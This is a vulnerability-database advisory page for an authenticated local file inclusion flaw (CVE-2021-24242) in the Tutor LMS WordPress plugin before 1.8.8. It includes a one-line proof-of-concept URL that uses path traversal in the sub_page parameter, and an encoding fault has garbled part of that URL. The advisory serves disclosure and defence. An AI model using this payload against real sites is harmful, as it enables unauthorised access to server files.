Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
wpvulndbSasaWPVDB-ID:20F3E63A-31D8-49A0-B4EF-209749FEFF5C
HistoryApr 05, 2021 - 12:00 a.m.

Tutor LMS < 1.8.8 - Authenticated Local File Inclusion

2021-04-0500:00:00
sasa
wpscan.com
58
JSON

The plugin is affected by a local file inclusion vulnerability through the maliciously constructed sub_page parameter of the plugin’s Tools, allowing high privilege users to include any local php file

PoC

https://your.domain/wp-admin/admin.php?page=tutor-toolsβŠ‚_page=..%2F..%2F..%2F..%2F..%2F..%2Findex

CPENameOperatorVersion
tutorlt1.8.8

Related

osv 1
wpexploit 1
cve 1
patchstack 1
prion 1
osv
osv
CVE-2021-24242
2021-04-22 21:15:09
wpexploit
wpexploit
Tutor LMS < 1.8.8 - Authenticated Local File Inclusion
2021-04-05 00:00:00
cve
cve
CVE-2021-24242
2021-04-22 21:15:00
patchstack
patchstack
WordPress Tutor LMS plugin <= 1.8.7 - Authenticated Local File Inclusion vulnerability
2021-04-05 00:00:00
prion
prion
Arbitrary file deletion
2021-04-22 21:15:00
JSON
Related for WPVDB-ID:20F3E63A-31D8-49A0-B4EF-209749FEFF5C
osv1wpexploit1cve1patchstack1prion1